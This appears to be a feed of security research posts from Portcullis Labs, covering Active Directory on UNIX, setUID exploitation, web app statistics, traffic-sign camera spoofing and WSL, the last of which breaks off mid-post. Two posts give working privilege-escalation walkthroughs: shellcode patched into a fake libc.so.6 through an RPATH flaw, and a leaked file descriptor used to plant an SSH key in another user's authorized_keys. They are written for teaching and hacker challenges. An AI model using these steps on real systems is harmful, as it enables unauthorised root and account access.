Portcullis Labs – Research and Development

An offensive introduction to Active Directory on UNIX
https://labs.portcullis.co.uk/blog/an-offensive-introduction-to-active-directory-on-unix/
Thu, 06 Dec 2018 09:18:36 +0000

The post An offensive introduction to Active Directory on UNIX appeared first on Portcullis Labs.

By way of an introduction to our talk at Black Hat Europe, Security Advisory EMEAR would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises’ Active Directory forests.

Background to Active Directory integration solutions

Having seen an uptick in unique UNIX infrastructures being integrated into customers’ existing Active Directory forests, we asked ourselves, “Does this present any concerns that may not be well understood?” This quickly became “What if an adversary could get into a UNIX box and then breach your domain?”
A typical Active Directory integration solution (in this case SSSD) shares a striking similarity with what a user might see on Windows. Notably, you have:

  • DNS – Used for name resolution
  • LDAP – Used for “one-time identification” and assertion of identity
  • Kerberos – Used for ongoing authentication
  • SSSD – Like LSASS
  • PAM – Like msgina.dll or the more modern credential providers

You can see a breakdown of this process here. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. are typically pushed as flat files to hosts.
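To give a feel for how these components hang together on the UNIX side, here is a minimal, purely illustrative sssd.conf for an AD-joined host (the domain name and option values are our own examples, not taken from any specific deployment):

```ini
# /etc/sssd/sssd.conf -- illustrative configuration for an AD-joined host
[sssd]
services = nss, pam
domains = example.com

[domain/example.com]
# Identity lookups go over LDAP to the domain controllers, while
# authentication goes over Kerberos to the same hosts acting as KDCs.
id_provider = ad
auth_provider = ad
access_provider = ad
krb5_realm = EXAMPLE.COM
# Cached credentials allow offline logins -- and are also an interesting
# artefact for an attacker who gains root on the host.
cache_credentials = true
```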

Our research

Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. In our work with a variety of customers, it has become apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. We’ve been talking about successful attacks against components such as LSASS and Kerberos for quite some time – Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer (Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor at how a blue team might spot an adversary performing them.

As a result of this research, we were able to develop tactics, tools and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing appropriate strategies to allow blue teams to detect and respond to such incursions. The Black Hat EU slides can be found here, whilst the tools we developed can be found on our GitHub repo.

Where 2 worlds collide: Bringing Mimikatz et al to UNIX
https://labs.portcullis.co.uk/presentations/where-2-worlds-collide-bringing-mimikatz-et-al-to-unix/
Thu, 06 Dec 2018 08:04:06 +0000

Presentation on Active Directory integration solutions for UNIX (as given at Black Hat Europe 2018).

Over the past fifteen years there’s been an uptick in “interesting” UNIX infrastructures being integrated into customers’ existing AD forests. Whilst the threat models enabled by this should be quite familiar to anyone securing a heterogeneous Windows network, they may not be as well understood by a typical UNIX admin who does not have a strong background in Windows and AD. Over the last few months we’ve spent some time looking at a number of specific Active Directory integration solutions (both open and closed source) for UNIX systems and documenting some of the tools, tactics and procedures that enable attacks on the forest to be staged from UNIX.

This talk describes the technical details regarding our findings. It includes proof-of-concepts (PoCs) showing real-world attacks against AD-joined UNIX systems. Finally, potential solutions and mitigating controls are discussed that will help either to prevent those attacks or at the very least to detect them when they occur.

Tools referenced in this talk include:

Eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX
724.9 KiB
MD5 hash: cc712c5e46b16fbff22a2566b1248a91

SetUID program exploitation: Crafting shared object files without a compiler
https://labs.portcullis.co.uk/blog/setuid-program-exploitation-crafting-shared-object-files-without-a-compiler/
Wed, 31 Oct 2018 12:18:59 +0000

In this post we look at an alternative to compiling shared object files when exploiting vulnerable setUID programs on Linux. At a high level we’re just going to copy the binary and insert some shellcode. First we take a look at the circumstances that might lead you to use this option. Also check out this previous post on setUID exploitation.

A hacker challenge gone wrong

A long time ago, I set my team the challenge of identifying an RPATH vulnerability and (if possible) exploiting it to run some code of their choosing with higher privileges. I named my program arp-ath – lest people waste too much time looking for other attack vectors:

$ cat arp-ath.c
#include <stdio.h>
int main(void) {
 printf("Hello world\n");
}
$ gcc -Wl,-rpath,. -o arp-ath arp-ath.c
# chmod 4755 arp-ath

The program behaves as you’d expect and is linked to libc.so.6 in the normal way:

$ ./arp-ath
Hello world
$ ldd arp-ath
 linux-vdso.so.1 => (0x00007fff0a3fd000)
 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb6dc0d6000)
 /lib64/ld-linux-x86-64.so.2 (0x00007fb6dc489000)

The vulnerability lies in the fact that the program searches the current directory for its libraries:

$ readelf -a arp-ath | grep -i path
0x000000000000000f (RPATH) Library rpath: [.]

(You’ll sometimes see RUNPATH instead of RPATH, but both work.) Check that it’s vulnerable like this:

$ touch libc.so.6
$ ./arp-ath
./arp-ath: error while loading shared libraries: ./libc.so.6: file too short

This challenge is very similar to Level 15 of the Nebula challenge if you want to play along using that – though it’s 32-bit.

The team found the “arp-ath” vulnerability pretty quickly and replied to let me know – which you’d expect, as it’s their job to find such vulnerabilities on client systems during Build Reviews.

What I hadn’t personally anticipated was what a pain it is to create a malicious modified version of libc.so.6 on 64-bit Linux. So rather than face the embarrassment of having posted a challenge that I didn’t actually have a full solution for, I cobbled together the shellcode-based solution outlined above. First let’s have a look at the difficulties I had in creating my own libc.so.6.

Problems compiling a replacement libc.so.6 on 64-bit Linux

I lost my original notes of what I’d tried, but I’m pretty sure that my colleagues and I followed a similar path to this solution to the Nebula level 15 challenge – which has a really nice write-up of how to debug shared libraries that don’t want to work.

Here’s an initial attempt, which should cause a shell to spawn when the library is loaded (note that I could also have replaced the “puts” function):

$ cat exploit1.c
#include <stdlib.h>
int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
 system("/bin/sh");
}
$ gcc -fPIC -shared -o libc.so.6 exploit1.c
$ ldd ./arp-ath
./arp-ath: ./libc.so.6: no version information available (required by ./arp-ath)
./arp-ath: ./libc.so.6: no version information available (required by ./libc.so.6)
linux-vdso.so.1 (0x00007ffeea77d000)
libc.so.6 => ./libc.so.6 (0x00007f50430f9000)
$ ./arp-ath
./arp-ath: ./libc.so.6: no version information available (required by ./arp-ath)
./arp-ath: ./libc.so.6: no version information available (required by ./libc.so.6)
./arp-ath: relocation error: ./libc.so.6: symbol __cxa_finalize, version GLIBC_2.2.5 not defined in file libc.so.6 with link time reference

So, let’s address those errors about lack of version numbers and failure to export __cxa_finalize (after much googling)…

$ cat version
GLIBC_2.2.5{};
$ cat exploit2.c
#include <stdlib.h>

void __cxa_finalize (void *d) {
 return;
}

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
 system("/bin/sh");
}
$ gcc -fPIC -shared -Wl,--version-script=version -o libc.so.6 exploit2.c
$ ./arp-ath
./arp-ath: relocation error: ./libc.so.6: symbol system, version GLIBC_2.2.5 not defined in file libc.so.6 with link time reference

Hmm. More errors.

Cutting short a very long sequence of trial and error, when we eventually tried to replicate the solution to the Nebula level 15 challenge on 64-bit, we found that it only seems to work for 32-bit:

$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 exploit2.c
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libc.a(system.o): relocation R_X86_64_32 against `.bss' can not be used when making a shared object; recompile with -fPIC
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libc.a(sysdep.o): relocation R_X86_64_TPOFF32 against symbol `errno' can not be used when making a shared object; recompile with -fPIC
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/6/../../../x86_64-linux-gnu/libc.a(sigaction.o): relocation R_X86_64_32S against `.text' can not be used when making a shared object; recompile with -fPIC
/usr/bin/ld: final link failed: Nonrepresentable section on output
collect2: error: ld returned 1 exit status

If I understood my googling correctly, I need a version of libc that’s been compiled with -fPIC, but that’s not possible for some reason I didn’t understand.

I did consider grabbing the source for libc and recompiling it after a modification, but decided life was too short. I had a better (or at least quicker) idea…

So just use Metasploit, then?

I had a quick go at generating a shared object file with msfvenom:

$ msfvenom -a x64 -f elf-so -p linux/x64/exec CMD=/bin/sh AppendExit=true > libc.so.6
$ ./arp-ath
./arp-ath: ./libc.so.6: no version information available (required by ./arp-ath)
./arp-ath: symbol lookup error: ./arp-ath: undefined symbol: __libc_start_main, version GLIBC_2.2.5

This was awfully familiar. I didn’t grapple much more with msfvenom after this.

Patching shellcode into a copy of libc.so.6

I figured I could open up a copy of libc.so.6 in a hex editor and paste some shellcode over the top of the __libc_start_main function. No matter how horribly I corrupted the file or how badly it crashed after it executed my shellcode, at least I’d have my shell.

I grabbed some shellcode off the internet – but could equally have generated it in Metasploit like this (I also appended a call to exit to stop the inevitable crash I mentioned):

$ msfvenom -a x64 -f hex -p linux/x64/exec CMD=/bin/sh AppendExit=true
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 55 bytes
Final size of hex file: 110 bytes
6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e8080000002f62696e2f73680056574889e60f054831ff6a3c580f05

Then I made a copy of libc.so.6 and located the file offset for the __libc_start_main function:

$ cp /lib/x86_64-linux-gnu/libc.so.6 .
$ objdump -FD libc.so.6 | grep _main
00000000000201f0 <__libc_start_main@@GLIBC_2.2.5> (File Offset: 0x201f0):
...

Using a hex editor, I pasted in the shellcode:

$ hexedit libc.so.6

(CTRL-G to go to an offset (0x201f0); paste in our shellcode; F2 to save; CTRL-C to quit.)

[Screenshot: using CTRL-G to seek to the offset in the file]
[Screenshot: shellcode pasted over existing code]
$ ./arp-ath
# id
uid=1000(x) gid=1000(x) euid=0(root) groups=1000(x)

Finally! :-)
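As an aside, the manual hexedit session can be scripted. The following C sketch is our own helper (not part of any published tool): it overwrites bytes at a given file offset in place, so calling it with the 0x201f0 offset found above and the 55 msfvenom bytes reproduces the patch.

```c
/* Sketch: overwrite bytes at a known file offset in place. The offset and
 * shellcode are the values from this example; recompute the offset with
 * objdump -F against your own copy of libc.so.6. */
#include <stdio.h>

/* Write len bytes of blob at offset in path; returns 0 on success. */
int patch_at_offset(const char *path, long offset,
                    const unsigned char *blob, size_t len)
{
    FILE *f = fopen(path, "r+b");  /* open for in-place update */
    if (f == NULL)
        return -1;
    if (fseek(f, offset, SEEK_SET) != 0 || fwrite(blob, 1, len, f) != len) {
        fclose(f);
        return -1;
    }
    return fclose(f) == 0 ? 0 : -1;
}
```

The same effect can be had with dd using conv=notrunc, but a tiny C helper is handy on boxes where you control the toolchain and want something repeatable.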

And this works on AIX too?

I tried to get this working on AIX – which typically doesn’t have a C compiler available, and typically has loads of RPATH vulnerabilities. However, the shellcode I tried was self-modifying. This is fine when you’re injecting shellcode as data, but the code section I was injecting into was read-only, so I got a segfault. I’ll follow up if I get this working.

Conclusion

The quick and dirty solution, while inevitably unsatisfying, is sometimes sufficient – especially given the lack of tools, source code and time you might have when exploiting this sort of vulnerability. Maybe it’s not a terrible solution. You be the judge.

Exploiting inherited file handles in setUID programs
https://labs.portcullis.co.uk/blog/exploiting-inherited-file-handles-in-setuid-programs/
Thu, 28 Jun 2018 16:00:40 +0000

In this post we look at one of many security problems that pentesters and security auditors find in setUID programs. It’s fairly common for child processes to inherit any open file handles in the parent process (though there are ways to avoid this). In certain cases this can present a security flaw. This is what we’ll look at in the context of setUID programs on Linux.

I was reminded of this technique as I tackled an old hacker challenge recently. It’s a fun challenge, and there’s a much easier solution than the technique I’m going to cover here. Maybe try both the hard way and the easy way.

Example program

Here’s a fairly minimal test case of example code, inspired by the Nebula challenge code.

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 char *cmd = argv[1];
 char tmpfilepath[] = "/tmp/tmpfile";  // Modern systems need "sysctl fs.protected_symlinks=0" or "chmod 0777 /tmp" for this to be vulnerable to the symlink attack we'll use later.
 char data[] = "pointless data\n";

 int fd = open(tmpfilepath, O_CREAT|O_RDWR, 0600);
 unlink(tmpfilepath);
 write(fd, data, strlen(data));
 setuid(getuid());
 system(cmd);
}

Let’s start by compiling this and setting the setUID bit so we have an example to work with:

root@challenge:/# useradd -m tom # victim/target user
root@challenge:/# useradd -m bob # attacker
root@challenge:/# cd ~bob
root@challenge:/home/bob# cp /share/fd-leak.c .
root@challenge:/home/bob# gcc -o fd-leak fd-leak.c
root@challenge:/home/bob# chown tom:tom fd-leak
root@challenge:/home/bob# chmod 4755 fd-leak
root@challenge:/home/bob# ls -l fd-leak
-rwsr-xr-x 1 tom tom 8624 Apr 12 11:06 fd-leak
root@challenge:/home/bob# su - bob
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)

For exploitation later, we’ll also need the target user (tom in this case) to have a .ssh directory in their home directory:

root@challenge:/# mkdir ~tom/.ssh; chown tom:tom ~tom/.ssh

What this program lacks in realism is hopefully made up for in its simplicity.

Normal operation

As can be seen from the code above, the program should:

  1. Create the file /tmp/tmpfile, then delete it. A file descriptor is retained
  2. Drop privileges. This is poor code for dropping privileges, btw. It suffices for this example, though
  3. Run a command that is supplied as an argument. It should run as the invoking user, not as the target user (tom)

Let’s try it out (note that I modify .bashrc to make it clearer to the reader when a subshell has been spawned):

root@challenge:/home/bob# su - bob
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ echo 'echo subshell...' > .bashrc
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ ./fd-leak bash -p
subshell...
bob@challenge:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
root@challenge:/home/bob# useradd -m tom
root@challenge:/home/bob# su - tom
$ mkdir .ssh
$ ls -la
total 28
drwxr-xr-x 3 tom tom 4096 Apr 12 11:42 .
drwxr-xr-x 2 tom tom 4096 Apr 12 11:42 .ssh
...

So, yes, fd-leak appears to drop privileges. (Our spawned shell isn’t responsible for the drop in privileges, as I’ve hopefully illustrated by passing -p to bash above and by running id directly.)

Finally, we expect the child process to inherit a file handle to the now deleted file /tmp/tmpfile:

bob@challenge:~$ ls -l /proc/self/fd
total 0
lrwx------ 1 bob bob 64 Apr 12 11:22 0 -> /dev/pts/2
lrwx------ 1 bob bob 64 Apr 12 11:22 1 -> /dev/pts/2
lrwx------ 1 bob bob 64 Apr 12 11:22 2 -> /dev/pts/2
lrwx------ 1 bob bob 64 Apr 12 11:22 3 -> '/tmp/tmpfile (deleted)'
lr-x------ 1 bob bob 64 Apr 12 11:22 4 -> /proc/53982/fd

It does. We’re all set.

High level exploit path

Our approach to attacking this vulnerable program will follow these high level steps which are covered in more detail in the sections below:

  1. Create a symlink that the vulnerable code will try to write to. This way we can create a file in a location of our choosing and with a name we choose. We’ll choose ~tom/.ssh/authorized_keys
  2. We’ll run some code in the context of a child process to manipulate the open file handle so we can write the contents of authorized_keys file
  3. Finally, we log in via SSH

Practical exploitation

Step 1: Symlink attack

Simple:

ln -s ~tom/.ssh/authorized_keys /tmp/tmpfile

This step was harder in the Nebula challenge, but I didn’t want to cloud the issue.

If we run the code now, we see that the authorized_keys file is created, but we don’t control the contents.

bob@challenge:~$ ls -l ~tom/.ssh/authorized_keys
-rw------- 1 tom bob 15 Apr 12 12:12 /home/tom/.ssh/authorized_keys
bob@challenge:~$ ln -s ~tom/.ssh/authorized_keys /tmp/tmpfile
ln: failed to create symbolic link '/tmp/tmpfile': File exists
bob@challenge:~$ ls -l /tmp/tmpfile
lrwxrwxrwx 1 bob bob 30 Apr 12 12:11 /tmp/tmpfile -> /home/tom/.ssh/authorized_keys
bob@challenge:~$ ./fd-leak id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ ls -l ~tom/.ssh/authorized_keys
-rw------- 1 tom bob 15 Apr 12 12:12 /home/tom/.ssh/authorized_keys

We also don’t control the permissions the file gets created with. (Feel free to try the above on authorized_keys2 after running “umask 0” to check.)

Step 2: Running code in child process

It’s pretty easy to run code because of the nature of the program. Again, this was harder in the Nebula challenge. We can see the file handle we want listed in /proc/self/fd. It’s file descriptor 3:

bob@challenge:~$ ln -s ~tom/.ssh/authorized_keys /tmp/tmpfile

bob@challenge:~$ ls -l /tmp/tmpfile
lrwxrwxrwx 1 bob bob 30 Apr 12 12:25 /tmp/tmpfile -> /home/tom/.ssh/authorized_keys
bob@challenge:~$ ./fd-leak bash
subshell...
bob@challenge:~$ ls -l /proc/self/fd
total 0
lrwx------ 1 bob bob 64 Apr 12 12:26 0 -> /dev/pts/1
lrwx------ 1 bob bob 64 Apr 12 12:26 1 -> /dev/pts/1
lrwx------ 1 bob bob 64 Apr 12 12:26 2 -> /dev/pts/1
lrwx------ 1 bob bob 64 Apr 12 12:26 3 -> /home/tom/.ssh/authorized_keys
lr-x------ 1 bob bob 64 Apr 12 12:26 4 -> /proc/54947/fd

So we can just “echo key > /proc/self/fd/3”? Not really. That’s just a symlink, and opening it is subject to the permissions of the underlying file – permissions we don’t have. Let’s confirm that:

bob@challenge:~$ ls -l /home/tom/.ssh/authorized_keys
-rw------- 1 tom bob 15 Apr 12 12:25 /home/tom/.ssh/authorized_keys
bob@challenge:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@challenge:~$ echo > /home/tom/.ssh/authorized_keys
bash: /home/tom/.ssh/authorized_keys: Permission denied
bob@challenge:~$ echo > /tmp/tmpfile
bash: /tmp/tmpfile: Permission denied
bob@challenge:~$ echo > /proc/self/fd/3
bash: /proc/self/fd/3: Permission denied

We need to write to file descriptor 3… So is there a version of cat that works with file descriptors? Not that I know of. Let’s write some small utilities that will help us get to grips with accessing inherited file handles. We’ll write three tools:

  • read – that uses the read function to read a set number of bytes from a particular file descriptor
  • write – that writes a string of our choosing to a particular file descriptor
  • lseek – that lets us position our read/write

Here’s the source and compilation of the (very crude) demo tools:

bob@challenge:~$ cat read.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 char buf[1024];
 memset(buf, 0, 1024);
 int r = read(atoi(argv[1]), buf, 10);
 printf("Read %d bytes\n", r);
 write(1, buf, r);
}

bob@challenge:~$ gcc -o read read.c
bob@challenge:~$ cat write.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 printf("writing %s to fd %s\n", argv[2], argv[1]);
 write(atoi(argv[1]), argv[2], strlen(argv[2]));
}
bob@challenge:~$ gcc -o write write.c
bob@challenge:~$ cat lseek.c
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
 printf("seek to position %s on fd %s\n", argv[2], argv[1]);
 lseek(atoi(argv[1]), atoi(argv[2]), SEEK_SET);
}

bob@challenge:~$ gcc -o lseek lseek.c

Let’s see the tools in action. First we try to read, then write to file descriptor 3, but the read always returns 0 bytes:

bob@challenge:~$ ./read 3
Read 0 bytes
bob@challenge:~$ ./write 3 hello
writing hello to fd 3
bob@challenge:~$ ./read 3
Read 0 bytes

The reason is that we need to seek to a location in the file that isn’t the end of the file. Let’s seek to position 0, the beginning of the file:

bob@challenge:~$ ./lseek 3 0
seek to position 0 on fd 3
bob@challenge:~$ ./read 3
Read 10 bytes
pointless bob@challenge:~$ ./read 3
Read 10 bytes
data
hellobob@challenge:~$ ./read 3
Read 0 bytes

Much better.

Finally we need to exploit the program above. We have two choices:

  • Run a shell as before, then use our new tool to write the key to authorized_keys; or
  • Make a new tool using the functions shown above to write to authorized_keys.

Let’s do the former. The latter is an exercise for the reader. Note that we need to seek to position 0 before we write our data. It’s important to overwrite the “pointless” message already there, as any leftover data would corrupt the authorized_keys file:

bob@challenge:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/bob/.ssh/id_rsa): bobkey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in bobkey.
Your public key has been saved in bobkey.pub.
bob@challenge:~$ cat bobkey.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2PezJjFSI778OvONA5aqfM2Y2d0eYizOkcqTimy7dXfaEhSKnRSRyfwOfwOOaVpLdZW9NmfaPd5G8RY3n+3QwDIPv4Aw5oV+5Q3C3FRG0oZoe0NqvcDN8NeXZFbzvcWqrnckKDmm4gPMzV1rxMaRfFpwjhedyai9iw5GtFOshGZyCHBroJTH5KQDO9mow8ZxFKzgt5XwrfMzvBd+Mf7kE/QtD40CeoNP+GsvNZESxMC3pWfjZet0p7Jl1PpW9zAdN7zaQPH2l+GHzvgPuZDgn+zLJ4CB69kGkibEeu1c1T80dqDDL1DkN1+Kbmop9/5gzOYsEmvlA4DQC6nO9NCTb bob@challenge
bob@challenge:~$ ls -l bobkey.pub
-rw-r--r-- 1 bob bob 387 Apr 12 12:30 bobkey.pub
bob@challenge:~$ ./lseek 3 0
seek to position 0 on fd 3
bob@challenge:~$ ./write 3 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2PezJjFSI778OvONA5aqfM2Y2d0eYizOkcqTimy7dXfaEhSKnRSRyfwOfwOOaVpLdZW9NmfaPd5G8RY3n+3QwDIPv4Aw5oV+5Q3C3FRG0oZoe0NqvcDN8NeXZFbzvcWqrnckKDmm4gPMzV1rxMaRfFpwjhedyai9iw5GtFOshGZyCHBroJTH5KQDO9mow8ZxFKzgt5XwrfMzvBd+Mf7kE/QtD40CeoNP+GsvNZESxMC3pWfjZet0p7Jl1PpW9zAdN7zaQPH2l+GHzvgPuZDgn+zLJ4CB69kGkibEeu1c1T80dqDDL1DkN1+Kbmop9/5gzOYsEmvlA4DQC6nO9NCTb bob@challenge'
 writing ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2PezJjFSI778OvONA5aqfM2Y2d0eYizOkcqTimy7dXfaEhSKnRSRyfwOfwOOaVpLdZW9NmfaPd5G8RY3n+3QwDIPv4Aw5oV+5Q3C3FRG0oZoe0NqvcDN8NeXZFbzvcWqrnckKDmm4gPMzV1rxMaRfFpwjhedyai9iw5GtFOshGZyCHBroJTH5KQDO9mow8ZxFKzgt5XwrfMzvBd+Mf7kE/QtD40CeoNP+GsvNZESxMC3pWfjZet0p7Jl1PpW9zAdN7zaQPH2l+GHzvgPuZDgn+zLJ4CB69kGkibEeu1c1T80dqDDL1DkN1+Kbmop9/5gzOYsEmvlA4DQC6nO9NCTb bob@challenge to fd 3

Step 3: Logging in via SSH

bob@challenge:~$ ssh -i bobkey tom@localhost
$ id
uid=1002(tom) gid=1002(tom) groups=1002(tom)

We’re done. We exploited the leaked file descriptor to write data of our choosing to tom’s authorized_keys file. We used a slightly unrealistic symlink attack along the way, but that doesn’t invalidate our discussion of how to use and abuse leaked file descriptors.

Conclusion

Hacker challenges are fun. Even when you accidentally find a much harder solution and waste 10 times longer than necessary.

Writing secure setUID programs can be difficult – particularly if you spawn child processes, and particularly if you use open() in directories writable by other users. fs.protected_symlinks provides some mitigation for directories with the sticky bit set.

Web Application Whitepaper
https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/
Wed, 06 Sep 2017 11:12:46 +0000

This document aims to analyse and explore data collected from technical assurance engagements during 2016.

The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP; however, due to time constraints, our data points were not submitted. As a result, the co-authors (Simone and Isa) chose to compare the EMEAR team’s statistics from 2016 against the now public 2017 Top 10 published by OWASP. Additionally, they took a look at the most common web application issues reported by the team during the last year and analysed their impact and severity.

WAW
WAW.pdf
September 6, 2017
Version: 1.0
925.6 KiB
MD5 hash: 0986d3ab7f6f55c71199296189ce5f62

Is your sign signed?
https://labs.portcullis.co.uk/blog/is-your-sign-signed/
Thu, 03 Aug 2017 16:30:01 +0000

Modern autonomous vehicles use a number of sensors to analyse their surroundings and act upon changes in their environment. A brilliant idea in theory, but how much of this sensory information can we actually trust? Cisco’s Security Advisory R&D team, a.k.a. Portcullis Labs, decided to investigate further.

Various researchers have documented attacks against vehicle sensors and cyber-physical systems that result in the vehicle performing unwanted actions, such as raising false alerts, malfunctioning and even crashing. The very same sensors that are used to improve driver efficiency have been proven vulnerable to both spoofing and signal-jamming attacks. In this blog entry, we will be focusing on the reliability of a vehicle’s underlying systems and its susceptibility to spoofing attacks, in particular the vulnerabilities in the front-facing camera, to ascertain how these problems may be addressed.

The problem

Multiple cameras can be found in today’s vehicles, some of which provide a full 360 view of their surroundings. One of the most common uses for these cameras is for road traffic sign detection. The traffic sign is picked up by the vehicle’s camera and displayed at eye level within the instrument cluster for the driver’s convenience. This is designed to reduce the potential consequences of a driver failing to recognise a traffic sign.

Professors from Zhejiang University and the University of South Carolina recently presented a whitepaper detailing the countless attack scenarios against vehicle sensors and front-facing cameras. With regards to vehicle cameras, their experiment focused on blinding the camera using multiple easily obtained light sources, which proved to be successful.

Our experiment, on the other hand, looked into fooling the vehicle’s camera in order to present false information to the driver.

We started off by printing different highway speed signs on plain paper, some of which contained arbitrary values, such as null bytes (%00) and letters. The print-outs were then held up by hand as our test vehicle drove closely past. As expected, the camera detected our improvised road signs and displayed the value to the driver. Spoofing speed values of up to 130 mph was possible, despite this being well beyond the national speed limit. Does this mean we can now exceed the speed limit? Naturally, abiding by the Highway Code still comes first, but it does beg the question of why something this farcical can still occur.

Sign Signed

Although one could argue that the camera has done its job and detected what appears to be a valid road sign, there are no additional checks being performed to distinguish whether the detected sign is legitimate or even sensible.

Other scenarios to consider involve the use of intelligent speed limiters, which are now present in some vehicles. Both the front-facing camera and built-in speed limiter are used to cap your driving speed at the limit recognised by the camera, preventing you from exceeding it even if you were to floor the accelerator. In a car with that functionality, what would happen if a 20 mph sign was spoofed onto the camera while driving on a 70 mph motorway? We have yet to test this specific scenario, but a potentially dangerous outcome is easy to imagine.

What could be done to mitigate this problem?

We need some form of validation of sensory input. If we review the advancements in securing biometrics, specifically fingerprint authentication devices, we can see that these devices are constantly improved by incorporating new features, such as "life detection", which detects the subtle conductivity a finger possesses, thus preventing spoofing and finger-cloning attacks. Could we implement a similar approach to securing vehicle sensors? Proper validation of the authenticity of each detected road sign would enable us to prevent spoofing attacks from occurring, but of course it is easier said than done.

What about introducing boundary detection? UK drivers know that 70 mph is the absolute speed limit within the country, therefore the detection of speeds higher than this should be flagged as an error. A fixed boundary could, of course, prove unhelpful when driving in Europe, for example, where speed limits differ, but this is easily addressed using GPS data, or by offering functionality that lets the driver set the locale manually rather than relying on a single global limit.
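Such a boundary check is simple to express in code. The following sketch is purely illustrative (the per-region maxima and function names are assumptions for demonstration, not taken from any real vehicle system):

```python
# Illustrative boundary check for a detected speed-limit sign.
# The per-region maxima below are assumptions for demonstration only.
REGION_MAX_MPH = {
    "UK": 70,
    "DE": 130,  # illustrative value for a European locale
}

def plausible_speed(detected_mph: int, region: str) -> bool:
    """Reject detected speed-limit values above the region's known maximum."""
    return 0 < detected_mph <= REGION_MAX_MPH.get(region, 70)

print(plausible_speed(70, "UK"))   # True
print(plausible_speed(130, "UK"))  # False: beyond the UK's absolute limit
```

The region could be selected from GPS data or set manually by the driver, as discussed above.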

Independent researchers have even suggested novel ways to improve road sign detection systems using neural networks in order to learn and distinguish properties of legitimate road signs.

Conclusion

We have demonstrated that front-facing vehicle cameras used for traffic sign detection can easily be fooled into recording a false speed limit. While cameras do have an essential place in autonomous vehicles, their integrity and availability properties present a great deal of room for improvement. Even simple features and configuration changes, such as boundary detection, could be applied to increase the accuracy and efficiency of these systems. Further research into securing vehicle cameras needs to be conducted to ensure that spoofing attacks cannot be carried out as trivially as is currently possible.

The post Is your sign signed? appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/is-your-sign-signed/feed/ 0
Exploring Windows Subsystem for Linux https://labs.portcullis.co.uk/blog/exploring-windows-subsystem-for-linux/ https://labs.portcullis.co.uk/blog/exploring-windows-subsystem-for-linux/#comments Thu, 27 Jul 2017 09:00:04 +0000 https://labs.portcullis.co.uk/?p=5869 Whilst there has been quite a lot of analysis of Microsoft’s new Windows Subsystem for Linux (aka WSL or Bash on Ubuntu on Windows) and how it functions (particularly from Alex Ionescu), most of this has focused on how it affects the Windows security model. Being a keen UNIX focused researcher, I decided to take […]

The post Exploring Windows Subsystem for Linux appeared first on Portcullis Labs.

]]>
Whilst there has been quite a lot of analysis of Microsoft’s new Windows Subsystem for Linux (aka WSL or Bash on Ubuntu on Windows) and how it functions (particularly from Alex Ionescu), most of this has focused on how it affects the Windows security model. Being a keen UNIX focused researcher, I decided to take it for a spin.

The first thing I did once I had it installed was look at how the Windows process tree had changed. Running it results in two new branches to your process tree. The first contains the Windows bash.exe instance which hosts your new terminal:

  • explorer.exe (runs as your user):
    • bash.exe (runs as your user):
      • conhost.exe (runs as your user)

Whilst the second contains the Linux process tree:

  • svchost.exe (runs as SYSTEM):
    • init (runs as your user, no disabled privileges, locked into a job):
      • bash (runs as your user, disabled privileges, locked into a job, break away set to true)

As you might expect, new code compiled to support this is well hardened and uses Windows 10's advanced mitigations. Specifically, bash.exe has the following mitigations enabled:

  • DEP enabled
  • ASLR high entropy, bottom up
  • CFG enabled

Digging a little further, the same can't be said for init, bash and other parts of the Linux process tree. Whilst DEP is enabled, ASLR and CFG are not. In fairness, this shouldn't come as any great surprise (they're Ubuntu-packaged binaries); however, it does start to show how introducing WSL to your system can change the system's posture.

The kernel

